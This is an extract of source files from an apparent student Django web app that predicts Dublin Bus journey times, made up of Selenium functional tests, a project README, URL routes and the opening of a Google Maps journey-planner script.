"length_bytes": 17582, "license_type": "no_license", "max_line_length": 147, "num_lines": 488, "path": "/Dublin_Bus/functional_tests/tests_index.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom Bus.models import Stop\nfrom users.models import favourite\nfrom django.urls import reverse\nfrom django.contrib import auth\nimport time\n\n\nUser = auth.get_user_model()\n\nclass IndexFunctionalTests(StaticLiveServerTestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome('functional_tests/chromedriver.exe')\n demo_user = User(username='myname', email='[email protected]')\n demo_user.is_staff = True\n demo_user.is_superuser = True\n 
self.demo_passwd = 'password'\n demo_user.set_password(self.demo_passwd)\n demo_user.save()\n self.demo_user = demo_user\n\n self.login_url = self.live_server_url + reverse(\"login\")\n\n def tearDown(self) -> None:\n self.browser.close()\n\n def test_index_noOrigin(self):\n self.browser.get(self.live_server_url)\n self.browser.find_element_by_id('submitJourneyPlanner').click()\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please use a valid starting point.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('route_suggestions').text,\n \"\"\n )\n\n def test_index_noDestin(self):\n self.browser.get(self.live_server_url)\n\n wait = WebDriverWait(self.browser, 10)\n originInput = self.browser.find_element_by_id('inputOrigin')\n\n originInput.send_keys(\"Rathmines\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n\n time.sleep(3)\n self.browser.find_element_by_id('submitJourneyPlanner').click()\n\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please use a valid destination.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('route_suggestions').text,\n \"\"\n )\n\n\n def test_index_submitRoute(self):\n self.browser.get(self.live_server_url)\n\n wait = WebDriverWait(self.browser, 10)\n originInput = self.browser.find_element_by_id('inputOrigin')\n destinInput = self.browser.find_element_by_id('inputDestin')\n\n originInput.send_keys(\"Rathmines\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n\n destinInput.send_keys(\"Trinity College\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n \n time.sleep(3)\n self.browser.find_element_by_id('submitJourneyPlanner').click()\n time.sleep(1)\n\n self.assertNotEquals(\n self.browser.find_element_by_id('route_suggestions').text,\n \"\"\n )\n self.assertFalse(\n self.browser.find_element_by_id('warning').is_displayed()\n )\n\n def test_index_FavouriteButton_noOrigin(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n\n self.browser.find_element_by_id('favouriteButton').click()\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please use a valid starting point.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-secondary\"\n )\n\n\n self.assertEqual(favourite.objects.all().count(), 0)\n\n def test_index_FavouriteButton_noDestin(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n wait = WebDriverWait(self.browser, 10)\n originInput = self.browser.find_element_by_id('inputOrigin')\n\n originInput.send_keys(\"Rathmines\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n\n time.sleep(3)\n 
self.browser.find_element_by_id('favouriteButton').click()\n\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please use a valid destination.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-secondary\"\n )\n\n\n self.assertEqual(favourite.objects.all().count(), 0)\n\n\n def test_index_favouriteButton(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n wait = WebDriverWait(self.browser, 10)\n originInput = self.browser.find_element_by_id('inputOrigin')\n destinInput = self.browser.find_element_by_id('inputDestin')\n\n originInput.send_keys(\"Rathmines\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n\n destinInput.send_keys(\"Trinity College\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n \n time.sleep(3)\n self.browser.find_element_by_id('favouriteButton').click()\n time.sleep(1)\n\n self.assertFalse(\n self.browser.find_element_by_id('warning').is_displayed()\n )\n\n time.sleep(3)\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-info\"\n )\n\n self.assertEqual(favourite.objects.all().count(), 1)\n\n self.browser.find_element_by_id('favouriteButton').click()\n\n time.sleep(3)\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-secondary\"\n )\n\n\n self.assertEqual(favourite.objects.all().count(), 0)\n\n def test_index_alreadyFavourite(self):\n demo_favourite = favourite(user_id = self.demo_user.pk,\n origin_name= 'Shankill, Dublin, Ireland',\n origin_lat = 53.2332663, \n origin_lon = -6.1237578, \n destin_name = 'East Wall, Dublin, Ireland', \n destin_lat = 53.3543216, \n destin_lon = -6.2341133,\n stops = 0\n )\n demo_favourite.save()\n\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n wait = WebDriverWait(self.browser, 10)\n originInput = self.browser.find_element_by_id('inputOrigin')\n destinInput = self.browser.find_element_by_id('inputDestin')\n\n originInput.send_keys(\"Shankill, Dublin,\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n\n destinInput.send_keys(\"East Wall, Dublin,\")\n try:\n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"pac-item\"))\n )\n finally:\n self.browser.find_element_by_class_name('pac-item').click()\n\n time.sleep(3)\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-info\"\n )\n\nclass BusIndexFunctionalTests(StaticLiveServerTestCase):\n\n def setUp(self):\n self.browser = webdriver.Chrome('functional_tests/chromedriver.exe')\n demo_user = User(username='myname', email='[email protected]')\n demo_user.is_staff = True\n demo_user.is_superuser = True\n self.demo_passwd = 'password'\n 
demo_user.set_password(self.demo_passwd)\n demo_user.save()\n self.demo_user = demo_user\n\n self.login_url = self.live_server_url + reverse(\"login\")\n\n stop1 = Stop(stop_id=\"8220DB000003\", stop_name=\"Dorset Street Lower, stop 14\", stop_lat=53.358531237878196, stop_lon = -6.2627765057086595)\n stop2 = Stop(stop_id=\"8220DB000014\", stop_name=\"Parnell Square West, stop 3\", stop_lat=53.352308551434895, stop_lon = -6.26381074216821)\n stop1.save()\n stop2.save()\n\n def tearDown(self) -> None:\n self.browser.close()\n\n\n def test_index_noOrigin_stop(self):\n self.browser.get(self.live_server_url)\n self.browser.find_element_by_id('stops-tab-btn').click()\n wait = WebDriverWait(self.browser, 10)\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n self.browser.find_element_by_id('submitJourneyPlanner').click()\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please input a valid first stop.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('route_suggestions').text,\n \"\"\n )\n\n def test_index_noDestin_stop(self):\n self.browser.get(self.live_server_url)\n self.browser.find_element_by_id('stops-tab-btn').click()\n\n wait = WebDriverWait(self.browser, 10)\n\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n originInput = self.browser.find_element_by_id('inputFirstStop')\n\n originInput.send_keys(\"Dorset Street Lower, stop 14\")\n self.browser.find_element_by_id('submitJourneyPlanner').click()\n\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please input a valid last stop.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('route_suggestions').text,\n \"\"\n )\n\n #This one can be somewhat temperamental\n def test_submitRoute_stop(self):\n self.browser.get(self.live_server_url)\n self.browser.find_element_by_id('stops-tab-btn').click()\n\n wait = WebDriverWait(self.browser, 10)\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n originInput = self.browser.find_element_by_id('inputFirstStop')\n destinInput = self.browser.find_element_by_id('inputLastStop')\n\n originInput.send_keys(\"Dorset Street Lower, stop 14\")\n destinInput.send_keys(\"Parnell Square West, stop 3\")\n\n self.browser.find_element_by_id('submitJourneyPlanner').click()\n\n self.assertFalse(\n self.browser.find_element_by_id('warning').is_displayed()\n )\n\n def test_index_FavouriteButton_noOrigin_stop(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.find_element_by_id('stops-tab-btn').click()\n\n wait = WebDriverWait(self.browser, 10)\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n\n self.browser.find_element_by_id('favouriteButton').click()\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please input a valid first stop.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-secondary\"\n )\n\n\n self.assertEqual(favourite.objects.all().count(), 0)\n\n\n def test_index_FavouriteButton_noDestin_stop(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n 
self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n self.browser.find_element_by_id('stops-tab-btn').click()\n\n wait = WebDriverWait(self.browser, 10)\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n originInput = self.browser.find_element_by_id('inputFirstStop')\n\n originInput.send_keys(\"Dorset Street Lower, stop 14\")\n self.browser.find_element_by_id('favouriteButton').click()\n\n self.assertEquals(\n self.browser.find_element_by_id('warning').text,\n \"Please input a valid last stop.\"\n )\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-secondary\"\n )\n\n self.assertEqual(favourite.objects.all().count(), 0)\n\n\n\n def test_index_favouriteButton_stop(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.find_element_by_id('stops-tab-btn').click()\n\n wait = WebDriverWait(self.browser, 10)\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n originInput = self.browser.find_element_by_id('inputFirstStop')\n destinInput = self.browser.find_element_by_id('inputLastStop')\n\n originInput.send_keys(\"Dorset Street Lower, stop 14\")\n destinInput.send_keys(\"Parnell Square West, stop 3\")\n \n self.browser.find_element_by_id('favouriteButton').click()\n\n self.assertFalse(\n self.browser.find_element_by_id('warning').is_displayed()\n )\n time.sleep(3)\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-info\"\n )\n\n self.assertEqual(favourite.objects.all().count(), 1)\n\n self.browser.find_element_by_id('favouriteButton').click()\n\n time.sleep(3)\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-secondary\"\n )\n\n\n self.assertEqual(favourite.objects.all().count(), 0)\n \n\n def test_index_alreadyFavourite_stop(self):\n bus_favourite = favourite(user_id = self.demo_user.pk,\n origin_name= 'Dorset Street Lower, stop 14',\n origin_lat = 53.358531237878196, \n origin_lon = -6.2627765057086595, \n destin_name = 'Parnell Square West, stop 3', \n destin_lat = 53.352308551434895, \n destin_lon = -6.26381074216821,\n stops = 1\n )\n\n bus_favourite.save()\n\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.find_element_by_id('stops-tab-btn').click()\n\n wait = WebDriverWait(self.browser, 10)\n try:\n wait.until(\n EC.element_to_be_clickable((By.ID, \"inputFirstStop\"))\n )\n finally:\n originInput = self.browser.find_element_by_id('inputFirstStop')\n destinInput = self.browser.find_element_by_id('inputLastStop')\n\n originInput.send_keys(\"Dorset Street Lower, stop 14\")\n destinInput.send_keys(\"Parnell Square West, stop 3\")\n\n time.sleep(1)\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-info\"\n )\n\n \n" }, { "alpha_fraction": 0.7482961416244507, "alphanum_fraction": 0.7880141139030457, "avg_line_length": 87.58333587646484, "blob_id": "4dddd582c638264fad309a984a0ee50f58ca99e7", "content_id": "deca5943974a9a3c192f2eb5286a9eb5b83b9ce4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4255, "license_type": "no_license", "max_line_length": 784, "num_lines": 48, "path": "/README.md", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "# Dublin_Bus\nA Dublin Bus Web Application (optimised for mobile devices) capable of predicting accurate journey times. \n\nThis repository is in part fulfilment of the degree of MSc. in Computer Science (Conversion) for module COMP47360.\n\nGroup Name: Group 6 (the 3 amigos)\n\nGroup Members:\nRachel Courtney \nAmanda Hegarty \nAndrew McClean\n\nURL: https://bustimate.com/ OR https://137.43.49.41 \n\nGithub Repository: https://github.com/rachelcourtney/Dublin_Bus.git \n\n## Project Specification:\nBus companies produce schedules which contain generic travel times. For example, in the Dublin Bus Schedule, the estimated travel time from Dun Laoghaire to the Phoenix Park is 61 minutes (http://dublinbus.ie/Your-Journey1/Timetables/All-Timetables/46a-1/). Of course, there are many variables which determine how long the actual journey will take. Traffic conditions, which are affected by the time of day, the day of the week, the month of the year and the weather, play an important role in determining how long the journey will take. These factors, along with the dynamic nature of events on the road network, make it difficult to efficiently plan trips on public transport modes which interact with other traffic.\n\n## The Solution:\nThis project involves analysing historic Dublin Bus data and weather data in order to create dynamic travel time estimates. Based on analysis of this historic data, a system was built which, when presented with any bus route, departure time, day of the week and current weather conditions, produces an accurate estimate of travel time for the complete route and sections of the route. Users should be able to interact with the system via a web-based interface which is optimised for mobile devices. When presented with any bus route, an origin stop and a destination stop, a time, a day of the week, and current weather, the system should produce and display via the interface an accurate estimate of travel time for the selected journey.\n\n## Application Architecture:\nBustimate is a dynamic web application hosted by an Apache server running on a Linux virtual machine provided by UCD for this purpose. The backend of the application was created using the Python-based web framework, Django. The webpages that make up the frontend of the application were made using the old reliables of HTML, JavaScript, and CSS, supplemented by the Bootstrap CSS framework and jQuery. \n\nThe application makes use of several APIs to obtain real time information. Cron jobs are used to periodically activate scrapers which collect hourly weather data from the OpenWeather API. A similar system is used to call the General Transit Feed Specification-Realtime (GTFS-R) API every 5 minutes for real time data on bus arrivals. The Google Maps API is used directly by the application's frontend to provide services such as a map, geolocation and route planning.\n\nA MySQL database, hosted on the same virtual machine, is used to store Django models used by the back-end as well as data obtained from the aforementioned APIs. Journey time predictions are provided to the application using several XGBoost models, one corresponding to each Dublin Bus route. 
Weather data and other features are sent to the predictive models by the backend and journey time estimates are returned.\n\n![tech_stack](https://user-images.githubusercontent.com/67108526/130132134-1e20eba6-8c2f-4419-9ef6-8033cea5089c.png)\n\n## Demonstration of Application:\n\n### Index Page\nThe index page features a journey planner that allows users to plan their Dublin Bus journey, including estimated travel time and arrival time as well as a fare calculator.\n\n![index](https://user-images.githubusercontent.com/67108526/130132743-2f58ec97-5516-4773-8c90-4d785b12d8e0.gif)\n\n\n### Login and Favourites Features\nUsers can create accounts with Bustimate and save their frequent routes.\n\n![favorites:login](https://user-images.githubusercontent.com/67108526/130132885-8af7c994-aac5-4cb5-80fa-a40d7e8ae8b2.gif)\n\n### Twitter Feed\nBustimate's live Twitter feed from Dublin Bus notifies users of service interruptions and delays.\n\n![twitter](https://user-images.githubusercontent.com/67108526/130133073-a168a975-23e4-4ed6-afbf-d9b265cbe914.gif)\n\n\n\n" }, { "alpha_fraction": 0.6818181872367859, "alphanum_fraction": 0.6818181872367859, "avg_line_length": 29, "blob_id": "73c0b89a4c8b01651c01310bb79502c7f21c70a1", "content_id": "88480206a7f5542e88cf5695a856e5f13e6c120e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 330, "license_type": "no_license", "max_line_length": 71, "num_lines": 11, "path": "/Dublin_Bus/Bus/urls.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('fetch_arrivals/', views.fetch_arrivals, name='arrivaltimes'),\n path('send_to_model', views.send_to_model, name='model'),\n url(r'^twitter$', views.twitter, name='twitter')\n\n]\n" }, { "alpha_fraction": 0.6141484975814819, "alphanum_fraction": 0.6176578998565674, "avg_line_length": 34.6184196472168, "blob_id": "090f47f95efb786e8edbafcae830c90450d58c9d", "content_id": "930b9a319e4f65017a6c8050d05f6252a3420be7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5414, "license_type": "no_license", "max_line_length": 142, "num_lines": 152, "path": "/Dublin_Bus/functional_tests/tests_login.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\n\nfrom users.models import favourite\nfrom django.urls import reverse\nfrom django.contrib import auth\nimport time\n\n\nUser = auth.get_user_model()\n\nclass LoginFunctionalTests(StaticLiveServerTestCase):\n def setUp(self):\n self.browser = webdriver.Chrome('functional_tests/chromedriver.exe')\n demo_user = User(username='myname', email='[email protected]')\n demo_user.is_staff = True\n demo_user.is_superuser = True\n self.demo_passwd = 'password'\n demo_user.set_password(self.demo_passwd)\n demo_user.save()\n self.demo_user = demo_user\n\n self.index_url = self.live_server_url + reverse(\"index\")\n self.login_url = self.live_server_url + reverse(\"login\")\n self.register_url = 
self.live_server_url + reverse(\"register\")\n self.favourite_url = self.live_server_url + reverse(\"favourites\")\n\n def tearDown(self) -> None:\n self.browser.close()\n\n def test_login(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n #Goes to index\n self.assertEquals(\n self.browser.current_url,\n self.index_url\n )\n\n self.assertTrue(\n self.browser.find_element_by_id('logoutButton').is_displayed()\n #idExists(self, 'logoutButton')\n )\n\n self.assertTrue(\n self.browser.find_element_by_id(\"fareCalculator\").is_displayed()\n #idExists(self, \"fareCalculator\")\n )\n\n\n def test_failed_login(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(\"badname\")\n\n self.browser.find_element_by_id('submitButton').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url\n )\n\n self.assertTrue(\n self.browser.find_elements_by_class_name(\"errorBox\")[0].is_displayed()\n #classExists(self, \"errorBox\")\n )\n\n self.assertEquals(\n self.browser.find_elements_by_class_name(\"errorBox\")[0].text,\n \"Username OR Password is incorrect.\"\n )\n\n def test_register(self):\n self.browser.get(self.register_url)\n new_user = {\n 'username' : 'newguy',\n 'email' : '[email protected]',\n 'password' : 'testing1234',\n }\n \n self.browser.find_element_by_name(\"username\").send_keys(new_user['username'])\n self.browser.find_element_by_name(\"email\").send_keys(new_user['email'])\n self.browser.find_element_by_name(\"password1\").send_keys(new_user['password'])\n self.browser.find_element_by_name(\"password2\").send_keys(new_user['password'])\n\n self.browser.find_element_by_id('submitButton').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.login_url\n )\n self.assertTrue(\n self.browser.find_elements_by_class_name(\"successBox\")[0].is_displayed()\n #classExists(self, \"successBox\")\n )\n\n self.assertEquals(\n self.browser.find_elements_by_class_name(\"successBox\")[0].text,\n \"Account created for \" + new_user['username'] + \".\"\n )\n\n self.assertEqual(User.objects.all().count(), 2)\n\n def test_register_fail(self):\n self.browser.get(self.register_url)\n new_user = {\n 'username' : 'newguy',\n 'email' : '[email protected]',\n 'password1' : 'testing1234',\n 'password2' : 'otherpassword',\n }\n\n self.browser.find_element_by_name(\"username\").send_keys(new_user['username'])\n self.browser.find_element_by_name(\"email\").send_keys(new_user['email'])\n self.browser.find_element_by_name(\"password1\").send_keys(new_user['password1'])\n self.browser.find_element_by_name(\"password2\").send_keys(new_user['password2'])\n\n self.browser.find_element_by_id('submitButton').click()\n\n self.assertEquals(\n self.browser.current_url,\n self.register_url\n )\n self.assertTrue(\n self.browser.find_elements_by_class_name(\"errorBox\")[0].is_displayed()\n #classExists(self, \"errorBox\")\n )\n\n self.assertEqual(User.objects.all().count(), 1)\n\n def test_register_password_rules(self):\n self.browser.get(self.register_url)\n wait = WebDriverWait(self.browser, 100)\n\n self.browser.find_element_by_id('passwordRulesButton').click()\n\n try: \n wait.until(\n EC.presence_of_element_located((By.CLASS_NAME, \"popover\"))\n )\n finally:\n self.assertEquals(\n self.browser.find_element_by_id('PasswordRules').text,\n 
\"Must contain at least 8 characters\\nCannot be entirely numeric\\nCannot be similar to other info\\nCannot be a common password\"\n )\n" }, { "alpha_fraction": 0.527085542678833, "alphanum_fraction": 0.5372248291969299, "avg_line_length": 32.917327880859375, "blob_id": "f1347ea146168ca6469b5a3bad44d3f8851db368", "content_id": "d6127b2b012b085697d1c8e3c43edbb307f3f1c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 38569, "license_type": "no_license", "max_line_length": 250, "num_lines": 1137, "path": "/Dublin_Bus/Bus/static/Bus/index.js", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "'use strict'; //to enable the use of let\nlet map;\nlet infoWindow;\nlet directionsService;\nlet directionsRenderer;\nlet geocoder;\n//list for storing reference to bus stop markers\nlet stopMarkers = {};\nlet stopMarkersArr = [];\nlet markerCluster;\nlet clusterStyles;\n//Inputs\nlet inputOrigin = document.getElementById(\"inputOrigin\");\nlet inputDestination = document.getElementById(\"inputDestin\");\nlet inputFirstStop = document.getElementById('inputFirstStop');\nlet inputLastStop = document.getElementById(\"inputLastStop\");\nlet inputTime = document.getElementById(\"time-dropdown\")\nlet autocompleteOrigin;\nlet autocompleteDestin;\n//Geolocation\nlet currentLocationOrigin = false;\nlet PositionOptions = {\n enableHighAccuracy: true,\n timeout: 5000,\n maximumAge: 0,\n};\n//Favourites\nlet isFavourite = false;\nlet currentFavourite;\n//Journey planner\nlet predictionDisplay;\nlet journeyDescription;\n//Polyline and icon options\nlet polylineCustomOptions;\nlet startIcon;\nlet endIcon;\nlet startMarker;\nlet endMarker;\n//Check if Logged in\nlet current_user = null;\n//Bus fares for calculator\nlet fares = false;\n// currentFavourite\nlet postedFavourite = false\n//stores bus departure time and travel time values for estimate arrival time\nlet time_tracker;\nlet duration_tracker = {};\nlet latest_departure = {};\nlet no_route = false;\n\n\n\n$.getJSON(\"./static/Bus/bus_fares.json\", function(data) {\n fares = data\n})\n\nfunction initMap() {\n\n let myLatLng = {\n lat: 53.350140,\n lng: -6.266155\n }; //set the latitude and longitude to Dublin\n\n map = new google.maps.Map(document.getElementById(\"map\"), {\n zoom: 14,\n center: myLatLng,\n mapTypeControl: false,\n streetViewControl: false,\n styles: [{\n stylers: [{\n saturation: -10\n }]\n },\n {\n featureType: \"administrative.land_parcel\",\n elementType: \"labels\",\n stylers: [{\n visibility: \"off\"\n }],\n },\n {\n featureType: \"landscape.man_made\",\n stylers: [{\n visibility: \"off\"\n }],\n },\n {\n featureType: \"poi\",\n elementType: \"labels.text\",\n stylers: [{\n visibility: \"off\"\n }],\n },\n {\n featureType: \"poi\",\n elementType: \"geometry\",\n stylers: [{\n visibility: \"off\"\n }],\n },\n {\n featureType: \"poi\",\n stylers: [{\n visibility: \"off\"\n }]\n },\n {\n featureType: \"road\",\n elementType: \"labels.icon\",\n stylers: [{\n visibility: \"on\"\n }],\n },\n {\n featureType: \"road.local\",\n elementType: \"labels\",\n stylers: [{\n visibility: \"on\"\n }],\n },\n {\n featureType: \"transit\",\n stylers: [{\n visibility: \"off\"\n }]\n },\n ],\n });\n\n //will be used to restrict autocomplete search box options, radius can be increased or decreased as needed\n var dublin_bounds = new google.maps.Circle({\n center: myLatLng,\n radius: 30000\n });\n\n //set up Polyline\n polylineCustomOptions = {\n strokeColor: '#05386B',\n 
strokeOpacity: 1.0,\n strokeWeight: 4,\n };\n\n //set up startMarker\n startMarker = new google.maps.Marker({\n label: {\n text: 'A',\n color: \"#05386B\",\n fontSize: \"12px\",\n fontWeight: \"bold\",\n }\n });\n //set up endMarker\n endMarker = new google.maps.Marker({\n label: {\n text: 'B',\n color: \"#05386B\",\n fontSize: \"12px\",\n fontWeight: \"bold\",\n }\n });\n\n // Setup Places Autocomplete Service\n // Set options for service\n // Need to add Dublin bounds to restrict search box\n const autocompleteOptions = {\n componentRestrictions: {\n country: [\"IE\"]\n },\n bounds: dublin_bounds.getBounds(),\n strictBounds: true,\n fields: [\"name\", \"geometry\", \"place_id\"], // Google charges per field\n };\n\n // Set ids of text-boxes attached to autocomplete\n autocompleteOrigin = new google.maps.places.Autocomplete(\n inputOrigin,\n autocompleteOptions\n );\n\n\n\n autocompleteDestin = new google.maps.places.Autocomplete(\n inputDestination,\n autocompleteOptions\n );\n\n //Make Directions Service object for getRoute\n directionsService = new google.maps.DirectionsService();\n //make start icon\n startIcon = {\n path: \"M0-48c-9.8 0-17.7 7.8-17.7 17.4 0 15.5 17.7 30.6 17.7 30.6s17.7-15.4 17.7-30.6c0-9.6-7.9-17.4-17.7-17.4z\",\n fillColor: '#FFAE42',\n fillOpacity: 1,\n scale: 0.65,\n labelOrigin: new google.maps.Point(0, -30),\n\n }\n //make end icon\n endIcon = {\n path: \"M0-48c-9.8 0-17.7 7.8-17.7 17.4 0 15.5 17.7 30.6 17.7 30.6s17.7-15.4 17.7-30.6c0-9.6-7.9-17.4-17.7-17.4z\",\n fillColor: '#FFAE42',\n fillOpacity: 1,\n scale: 0.65,\n labelOrigin: new google.maps.Point(0, -30),\n\n }\n\n\n\n // Make Directions Renderer object for getRoute\n directionsRenderer = new google.maps.DirectionsRenderer({\n polylineOptions: polylineCustomOptions,\n suppressMarkers: true,\n preserveViewport: false,\n });\n\n //make geocoder object for geolocation/journey planner feature\n geocoder = new google.maps.Geocoder();\n\n\n //This should not be in init_map\n\n //autocomplete listeners\n autocompleteOrigin.addListener(\"place_changed\", checkFavourite, false);\n autocompleteDestin.addListener(\"place_changed\", checkFavourite, false);\n\n if (typeof loadFavourite === \"function\") {\n loadFavourite()\n }\n}\n\n//Returns Data from origin/FirstStop and destination/LastStop inputs\nfunction getRouteData(warning = true) {\n var active_tab = document.querySelector('.tab-content .active');\n var route = {\n user: current_user\n }\n if (active_tab['id'] == \"locations-tab\") {\n route['stops'] = 0;\n route['origin_name'] = inputOrigin.value;\n route['destin_name'] = inputDestination.value;\n\n var destination = autocompleteDestin.getPlace();\n var origin = autocompleteOrigin.getPlace();\n\n if (!origin) {\n if (warning) {\n showWarning(\"Please use a valid starting point.\")\n };\n return false;\n } else if (!destination) {\n if (warning) {\n showWarning(\"Please use a valid destination.\")\n };\n return false;\n } else if (origin.place_id == destination.place_id) {\n if (warning) {\n showWarning(\"Origin and destination are identical.\")\n };\n return false;\n }\n\n route['origin_lat'] = origin.geometry.location.lat();\n route['origin_lon'] = origin.geometry.location.lng();\n\n route['destin_lat'] = destination.geometry.location.lat();\n route['destin_lon'] = destination.geometry.location.lng();\n } else {\n route['stops'] = 1;\n route['origin_name'] = inputFirstStop.value;\n route['destin_name'] = inputLastStop.value;\n\n var originLatLon = getStopData(route['origin_name'], stops);\n var 
